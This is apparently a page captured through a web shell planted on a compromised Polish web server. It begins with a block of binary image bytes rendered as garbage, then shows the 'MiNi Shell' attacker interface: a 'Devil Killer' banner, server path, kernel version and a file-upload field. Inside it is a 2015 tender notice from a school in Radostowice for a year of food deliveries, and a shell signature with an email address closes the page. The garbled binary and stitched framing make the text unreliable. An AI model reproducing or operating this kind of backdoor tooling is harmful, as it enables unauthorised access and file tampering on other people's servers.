JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151214/341498-N-2015.html

<p class="kh_header"><b>Radostowice: Dostawa produktów spożywczych dla Szkoły Podstawowej im. J. Brzechwy  w Radostowicach  w 2016 r.</b><br>
<b>Numer ogłoszenia: 341498 - 2015; data zamieszczenia: 14.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. J. Brzechwy w Radostowicach , ul. Dworcowa 56, 43-262 Radostowice, woj. śląskie, tel. 32 21 52 22, faks 32 212 52 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radostowicesp.edupage.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych dla Szkoły Podstawowej im. J. Brzechwy  w Radostowicach  w 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Dostawa produktów spożywczych dla Szkoły Podstawowej im. J. Brzechwy w Radostowicach w 2016 r. tj. od 01.01.2016 r. do 31.12.2016 r. 
Zakres przedmiotu zamówienia został podzielony na VII części. Wykonawca może złożyć ofertę na wybraną/ne do realizacji część/i zamówienia:
Część I - Pieczywo, świeże wyroby piekarskie i ciastkarskie
Część II _ Mięso, wędliny, konserwy i wyroby mięsne 
Część III - Drób
Część  IV - Ryby
Część V - Warzywa, owoce i przetwory
Część VI - Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie
i jaja
Część VII - Pozostałe produkty spożywcze.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.80.00.00-6, 15.50.00.00-3, 15.60.00.00-4, 15.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu wykazania spełnienia warunku wykonawcy zobowiązani są do złożenia oświadczenia z art. 22 ust. 1 ustawy - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie spełniony w sytuacji gdy wykonawca wykaże wykonanie w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej jednego zamówienia polegającego na dostawie ciągłej przez okres minimum 1 roku produktów spożywczych odpowiadających rodzajem i wartością części, na którą Wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku wykonawcy zobowiązani są do złożenia oświadczenia z art. 22 ust. 1 ustawy - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku wykonawcy zobowiązani są do złożenia oświadczenia z art. 22 ust. 1 ustawy - załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>zgodnie z pkt III.3.2 niniejszego ogłoszenia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy sporządzony zgodnie z załącznikiem nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radostowicesp.edupage.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. J. Brzechwy w Radostowicach, 43-262 Radostowice, ul. Dworcowa 56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2015 godzina 09:00, miejsce: Szkoła Podstawowa im. J. Brzechwy w Radostowicach, 43-262 Radostowice, ul. Dworcowa 56.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb zwykły 1000 g	szt	100
Chleb graham nie barwiony 400 g	szt.	500
Chleb razowy 400 g	szt.	200
Chleb pełnoziarnisty 550 g	szt.	100
Bułka kanapkowa, wek 300 g	szt	50
Bułka kajzerka 400 g	szt	200
Rogale zwykłe 100 g	szt	300
Strucla duża 400 g	szt	10
Bułka graham 80 g	szt	2000
Bułka tarta pełnoziarnista 1000 g	kg	50
Bułka tarta 1000 g	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO, WĘDLINY, KONSERWY I WYROBY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rosół woł. z/k świeże	kg	150
Łopatka wp. b/k świeża	kg	1400
Karczek wp. b/k świeży	kg	300
Gulaszowe woł. extra świeże	kg	150
Mielonka garmażeryjna zawierająca co najmniej 70% mięsa	kg	200
Schab wp z/k	kg	100
Polędwica sopocka zawierająca co najmniej 70% mięsa	kg	30
Polędwica drobiowa zawierająca co najmniej 70% mięsa	kg	30
Kiełbasa szynkowa zawierająca co najmniej 70% mięsa	kg	60
Parówka drobiowa zawierająca co najmniej 70% mięsa z drobiu	kg	350
Boczek wędzony chudy	kg	40
Wołowina b/k ekstra	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z kurczaka świeży bez widełek	kg	1200
Noga z kurczaka świeża	kg	1000
Pasztet drobiowy- zawierający ponad 70% mięsa drobiowego 	kg	25
Szyje z indyka świeże	kg	100
Podudzie 
z kurczaka 
(nie ćwiartka) świeże	kg	700
Udziec z indyka świeży	kg	100
Filet z indyka świeży	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z makreli w pomidorach lub oleju konserwa 170 g zawierający co najmniej 60% mięsa z ryby	szt.	30 
Filet śledziowy w pomidorach lub oleju konserwa 170 g zawierający co najmniej 60% mięsa z ryby	szt. 	30
Filet mintaj mrożony glazura 10%	kg	1700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WARZYWA, OWOCE I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki		kg	5000
Fasola Piękny Jaś 		kg	50
Groch łuskany 		kg	30
Buraki		kg	300
Cebula		kg	250
Czosnek		kg	10
Kapusta biała		kg	600
Kapusta czerwona		kg	400
Kapusta świeża włoska		kg	30
Kapusta kiszona		kg	500
Marchew		kg	200
Pietruszka zielona świeża		kg	40
Seler korzeń		kg	60
Koperek pęczki zielony		pęczek	40
Szczypiorek		pęczek	40
Ogórek konserwowy 1L		szt	40
Sałatka szwedzka 2650 ml Urbanek lub równoważny		szt	100
Koncentrat pomidorowy 1 L 30% Pudliszki lub równoważny		szt	60
Koncentrat buraczkowy 300 ml Krakus lub równoważny		szt	40
Dżem truskawkowy niskosłodzony pasteryzowany 280 g		szt	50
Brzoskwinia konserwowa w syropie lekkim 450 g		puszka	10
Malina mrożona 450 g		paczka	20
Truskawka mrożona 450 g		paczka	40
Kalafior mrożony 2500g		paczka	20
Zupa jarzynowa 7 składników 2500g		paczka	20
Mrożonka jarzynowa chińska 2500g		paczka	20
Papryka konserwowa 720 ml Rolnik lub równoważny		szt	20
Fasola zielona szparagowa konserwowa 2 kg		szt	40
Kukurydza konserwowa 400 g 		szt	20
Kalafior świeży		szt	100
Kapusta pekińska		szt	150
Rzodkiewka		pęczek	20
Ogórek zielony		kg	350
Papryka czerwona żółta świeża		kg	15
Pomidor koktailowy		kg	100
Pomidor 		kg	200
Cytryna 		kg	20
Pomarańcza 		kg	100
Mandarynka 		kg	300
Banan 		kg	400
Gruszka		kg	400
Jabłka 		kg	600
Nektarynka 		kg	100
Kiwi 		kg	50
śliwka		kg	200
Śliwka suszona bezpestkowa 100 g		paczka	200
Sałata zielona		szt	90
Sałata lodowa		szt.	40
kalarepa		szt.	20
Orzechy laskowe łuskane nie solone		paczka	200
Orzechy ziemne nie solone 100 g		paczka	200
Ketchup łagodny zawierający co najmniej 120 g pomidorów na 100 g ketchupu i nie więcej niż 10 g cukru na 100 g 		szt	50
Ocet 10% 500 ml		szt	30
Ogórek kiszony op. 10 kg		szt	10
Sok 100% 10 g cukru na 100 g		szt	300
Brokuł świeży		szt	400
Pietruszka korzeń		kg	60
Por		szt	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> OLEJE TŁUSZCZE ZWIERZĘCE I ROŚLINNE, PRODUKTY MLECZARSKIE I JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej  Kujawski lub równoważny 		L	300
Margaryna mleczna Bielmar lub równoważny
250 g 		szt.	60
Kefir 400 ml zawartość cukru do 10 g na 100 g/ml		szt.	300
Jogurt naturalny 330 ml zawartość cukru do 10 g na 100 g/ml		szt.	400
Masło ekstra 200 g 82%		szt.	600
Mleko 2%		L	1000
Twaróg półtłusty 
250 g zawartość cukru do 10 g na 100 g/ml		szt.	100
Jogurt 7 zbóż pełnoziarnisty zawartość cukru do 10 g na 100 g/ml		szt.	30
Ser żółty Gouda Mońki lub równoważny 		kg	120
Śmietana słodka 18% 400 ml 		szt.	150
Śmietana zakwaszana 18%  400 ml 		szt.	200
Jaja świeże L	szt.	10000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PRODUKTY SYPKIE I RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sól morska Prymat lub równoważny		kg	60
Mąka ziemniaczana Superior lub równoważny		kg	150
Mąka pszenna tortowa		kg	400
Mąka wrocławska		kg	150
Krupiczka		kg	10
Cukier kryształ		kg	600
Kasza jęczmienna wiejska extra		kg	120
Kasza jaglana		kg	10
Kasza gryczana		kg	50
Kasza kukurydziana		kg	10
Ryż biały Kupiec lub równoważny		kg	100
Makaron świderki Libella 500 g lub równoważny		kg	200
Makaron świderki pełnoziarnisty Libella lub równoważny		kg	50
Makaron łazanki 500 g Lubella lub równoważny		kg	100
Makaron domowy Nitki 
 5-6 jajeczny		kg	25
Makaron małe muszelki Lubella lub równoważny		kg	30
Papryka mielona słodka, sypka 700 g 		paczka	5
Pieprz mielony 800 g 		paczka	5
Pieprz ziarnisty cały 8 g 		szt. 	5
Ziele angielskie 500 g 		paczka	2
Lubczyk 8 g		paczka	200
Bazylia 10 g		paczka	200
Oregano 10 g		Paczka 	200
Kminek cały 8 g		szt.	5
Herbata czarna Lipton lub równoważny 100 szt.		paczka	5
Herbata owocowa malinowa Saga lub równoważny		kg	25
Herbata owocowa wiśniowa Saga lub równoważny		kg	25
Kawa zbożowa 500 g Elekta lub równoważny		paczka	40
Kakao Decomoreno 80 g lub równoważny		paczka	15
Proszek do pieczenia 30 g		paczka	30
Cukier waniliowy 30 g		paczka 	50
Cukier puder 400 g		paczka	20
Cynamon mielony 15 g 		paczka	10
Płatki owsiane 500 g		paczka 	20
Płatki kukurydziane 1 kg bez cukru Libella lub równoważny		kg	60
Płatki jaglane naturalne 100% Kupiec lub równoważny		kg	5
Kasza manna		kg	20
Drożdże 100 g		szt	120
Rodzynki sułtańskie		kg	3
migdały		kg	2
Orzechy włoskie		kg	2
Żurawina 1 kg		kg	2
Miód pszczeli naturalny 1 l		szt. 	20
Czekolada gorzka 100 g		szt. 	100
Ocet jabłkowy fermentacyjny 6%		szt. 	5
Mąka żurkowa 500 g 		kg	40
Majonez dekoracyjny 700 ml Winiary lub równoważny		szt	6
Liść laurowy 200 g		paczka	2
Majeranek 8 g		paczka	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com